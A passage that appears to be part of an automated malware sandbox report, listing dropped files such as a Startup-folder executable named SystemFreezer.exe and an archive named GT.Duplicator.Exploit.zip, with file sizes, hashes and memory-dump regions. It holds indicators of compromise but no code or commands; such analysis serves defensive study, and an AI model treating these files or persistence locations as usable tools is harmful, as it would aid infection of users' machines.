                                    ebca653f018925b6333923272f1f0c6aea41c4c08619c7e2a1d401b7cfa317b61f9516db8b81cba5c3d060659f3ab7f2c71205f9a782d98c9b6aec2171b43e3f

                                  • C:\Users\Admin\AppData\Local\Temp\dcd.exe
                                    Filesize: 227KB
                                    MD5: b5ac46e446cead89892628f30a253a06
                                    SHA1: f4ad1044a7f77a1b02155c3a355a1bb4177076ca
                                    SHA256: def7afcb65126c4b04a7cbf08c693f357a707aa99858cac09a8d5e65f3177669
                                    SHA512: bcabbac6f75c1d41364406db457c62f5135a78f763f6db08c1626f485c64db4d9ba3b3c8bc0b5508d917e445fd220ffa66ebc35221bd06560446c109818e8e87

                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SystemFreezer.exe
                                    Filesize: 884KB
                                    MD5: c535be7d5fca25b986c17ff8dda9d482
                                    SHA1: 99199849ab5140e0df64083ae70c9b65265308f7
                                    SHA256: 07cc4f727bac2537a45421540107751df24bb736d6e471d90f84e73366e111e0
                                    SHA512: c7ac6268ce848f7137e9c31407abbad528f0129d1c436c831b79ca30ec304ebd7da0d94fe70128be3c3c383edb85b59c9a546e8e64e6cec11be414c7bd4159c2

                                  • C:\Users\Admin\Downloads\GT.Duplicator.Exploit.zip
                                    Filesize: 607KB
                                    MD5: 19f3b40baf7953f2068ec3f148a2c1aa
                                    SHA1: d7c9d9307d317177d7b8f394b838e57f0157bbc5
                                    SHA256: 3064f41531487ee3b9205367940d50ab150775008c1ff13b92069cbbbb828e1f
                                    SHA512: 364b8b24cef388466d5365d7a6a738082770e4be648d1de3745df346ebabcf838749f16dfe647133550e5922c90ee5fe464e3528691a7e05bdcc55a379bde6c0

                                  • memory/628-181-0x00007FF8D8270000-0x00007FF8D8D31000-memory.dmp (Filesize: 10.8MB)
                                  • memory/628-176-0x000000001B980000-0x000000001B990000-memory.dmp (Filesize: 64KB)
                                  • memory/628-175-0x000000001B980000-0x000000001B990000-memory.dmp (Filesize: 64KB)
                                  • memory/628-174-0x000000001B980000-0x000000001B990000-memory.dmp (Filesize: 64KB)
                                  • memory/628-173-0x0000000001440000-0x0000000001441000-memory.dmp (Filesize: 4KB)
                                  • memory/628-172-0x00007FF8D8270000-0x00007FF8D8D31000-memory.dmp (Filesize: 10.8MB)
                                  • memory/2292-111-0x000000001B770000-0x000000001B780000-memory.dmp (Filesize: 64KB)
                                  • memory/2292-105-0x0000000002B60000-0x0000000002BB0000-memory.dmp (Filesize: 320KB)
                                  • memory/2292-106-0x0000000001260000-0x0000000001261000-memory.dmp (Filesize: 4KB)
                                  • memory/2292-107-0x0000000001260000-0x0000000001261000-memory.dmp (Filesize: 4KB)
                                  • memory/2292-108-0x000000001B770000-0x000000001B780000-memory.dmp (Filesize: 64KB)
                                  • memory/2292-109-0x0000000002BB0000-0x0000000002BEE000-memory.dmp (Filesize: 248KB)
                                  • memory/2292-110-0x000000001B770000-0x000000001B780000-memory.dmp (Filesize: 64KB)
                                  • memory/2292-120-0x00007FF8D8680000-0x00007FF8D9141000-memory.dmp (Filesize: 10.8MB)
                                  • memory/2292-103-0x0000000000990000-0x0000000000A76000-memory.dmp (Filesize: 920KB)
                                  • memory/2292-104-0x00007FF8D8680000-0x00007FF8D9141000-memory.dmp (Filesize: 10.8MB)
                                  • memory/5084-136-0x0000000000900000-0x0000000000901000-memory.dmp (Filesize: 4KB)
                                  • memory/5084-144-0x00007FF8D8150000-0x00007FF8D8C11000-memory.dmp (Filesize: 10.8MB)
                                  • memory/5084-134-0x00007FF8D8150000-0x00007FF8D8C11000-memory.dmp (Filesize: 10.8MB)
                                  • memory/5084-135-0x0000000000900000-0x0000000000901000-memory.dmp (Filesize: 4KB)
                                  • memory/5084-138-0x000000001AD50000-0x000000001AD60000-memory.dmp (Filesize: 64KB)
                                  • memory/5084-137-0x000000001AD50000-0x000000001AD60000-memory.dmp (Filesize: 64KB)
